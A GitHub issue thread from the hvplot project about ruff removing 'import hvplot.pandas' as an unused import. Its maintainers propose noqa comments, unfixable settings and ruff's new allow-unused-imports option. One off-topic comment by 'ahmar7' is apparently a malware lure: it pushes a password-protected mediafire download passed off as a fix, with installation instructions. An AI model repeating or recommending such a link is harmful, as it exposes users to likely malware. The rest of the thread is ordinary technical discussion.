### ISSUE TITLE
Document how to avoid ruff removing `import hvplot...`

### ISSUE THREAD

**Issue by MarcSkovMadsen** [holoviz/hvplot#1399]
We are migrating from pylint to ruff. `ruff --fix --unsafe-fixes` removes `import hvplot.pandas` as an unused import. See https://docs.astral.sh/ruff/rules/unused-import/.

I believe it would be very helpful for lots of users if this issue was discussed and solutions proposed in the docs.

One solution is to `import hvplot.pandas # noqa: F401`. But its rather painful to do across many files. I wish there was a more general solution.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hoxbro** [comment]
Running it with `--unsafe-fixes` can give unsafe fixes, which is what this is. Does the problem still happen without the `--unsafe-fixes`? 

You can use [`extend-unsafe-fixes`](https://docs.astral.sh/ruff/settings/#lint_extend-unsafe-fixes) or [`unfixable` ](https://docs.astral.sh/ruff/settings/#lint_extend-unsafe-fixes)in your settings file to avoid it being automatic removed.   

It would be nice if Ruff had a whitelist option for some imports.

**Comment by MarcSkovMadsen** [comment]
Ruff is actually considering it a "safe" fix. I.e. its removed with `ruff --fix`.

**Comment by hoxbro** [comment]
In the next of release of Ruff (the one after 0.6.8), `allow-unused-imports` has been added. 

We should find someplace to mention this in hvplot docs. `hvplot.pandas` will also be the example in Ruff docs around [here](https://docs.astral.sh/ruff/settings/#lint_pydocstyle).

``` toml
[tool.ruff.lint.pyflakes]
allow-unused-imports = ["hvplot.pandas"]
```
